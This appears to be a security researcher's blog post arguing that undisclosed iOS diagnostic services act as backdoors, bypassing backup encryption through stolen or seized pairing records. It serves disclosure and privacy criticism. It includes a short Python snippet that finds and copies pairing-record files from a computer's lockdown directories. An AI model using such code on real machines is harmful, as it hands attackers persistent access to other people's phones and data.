In a response from Apple PR to journalists about my HOPE/X talk, it looks like Apple may have inadvertently admitted that, in the most widely accepted sense of the word, they do indeed have backdoors in iOS, though they claim the purpose is for “diagnostics” and “enterprise” use.
The problem with this is that these services dish out data (and bypass backup encryption) regardless of whether “Send Diagnostic Data to Apple” is turned on or off, and regardless of whether the device is managed by an enterprise policy of any kind. If these services were really intended for such purposes, you’d expect them to work only when the device is managed/supervised or when the user has enabled diagnostic mode. Unfortunately that isn’t the case: these mechanisms are enabled on every single device, there is no way to turn them off, and users are never prompted for consent before this kind of personal data is sent off the device.
Apple’s seeming admission to having these services, however legitimate a use they serve Apple, has unfortunately opened up some serious privacy weaknesses as well. We know, from the Snowden leaks via Der Spiegel, that NSA has penetrated target desktop machines in order to later access iPhone features. We also know that desktop machines are often seized by law enforcement, and that with the pairing record data on them, the data on the device can be accessed using these services, even if backup encryption is turned on. Pairing records can be stolen in a number of different ways: from a shared coffee shop computer, from an ex-lover whose computer you used to trust, by leaving your phone unlocked at a bar (Apple should know something about this), or in countless other scenarios, all giving the attacker perpetual access to your device via USB, and usually WiFi, until you wipe the device. It is only recently that iOS even added a trust dialog; prior to this, your device would automatically pair with anything you plugged it into.
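To make concrete just how thin this protection is: a pairing record is nothing more than a property-list file sitting on the paired desktop, named after the device’s UDID. As a minimal sketch, assuming the commonly documented lockdown directory locations (which may vary by OS version), and with hypothetical helper names `find_pairing_records` and `steal` chosen purely for illustration:

```python
import glob
import os
import shutil

# Commonly documented lockdown directories (an assumption; exact
# locations may vary by OS version):
LOCKDOWN_DIRS = [
    "/var/db/lockdown",                # OS X
    r"C:\ProgramData\Apple\Lockdown",  # Windows
]

def find_pairing_records(dirs=LOCKDOWN_DIRS):
    """Return every pairing-record plist found in the given directories.

    Each plist is named after the UDID of a device this computer has
    paired with; a copy of the file is the "something you have" that
    grants access to that device.
    """
    records = []
    for d in dirs:
        records.extend(glob.glob(os.path.join(d, "*.plist")))
    return records

def steal(record_path, dest_dir):
    """Copying the single plist file is all an attacker needs to do."""
    os.makedirs(dest_dir, exist_ok=True)
    return shutil.copy(record_path, dest_dir)
```

There is no passphrase wrapping the file and nothing binding it to the machine it was created on: whoever holds a copy holds the pairing.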
Obviously, Apple realized that pairing in and of itself offered very little security, as they later added backup encryption as a feature, something that also requires pairing to perform. So Apple doesn’t trust pairing as a “security” solution either. And for good reason: it wasn’t designed to be secure. It is not two-factor; it is not encrypted with a user passphrase; it is simply “something you have” that grants complete, unfettered access to the phone. And it can be had as easily as copying one file, or created on the fly over USB. It can be used if law enforcement seizes your computer; it can be stolen by someone hacking in; it is by all means insecure. But even with the pairing record, I would have expected the data that comes off my device to be encrypted with the backup password, right? These services completely bypass it.
I understand that every OS has diagnostic functions, but these services break the promise Apple makes with the consumer when they enter a backup password: that the data on their device will only come off the phone encrypted. The consumer is also not made aware of these mechanisms, nor prompted in any way by the device. There is simply no way to justify such a massive leak of data without any explicit consent from the user.
The data these services leak is of an extremely personal nature. There is no notification to the user. Stateful cache data is never supposed to come off the phone, even in a backup. A better diagnostic tool would have been engineered to respect the user: prompt them the way applications do when requesting access to data, and respect backup encryption. Tell me, what is the point of promising the user encryption if there is a backdoor to bypass it?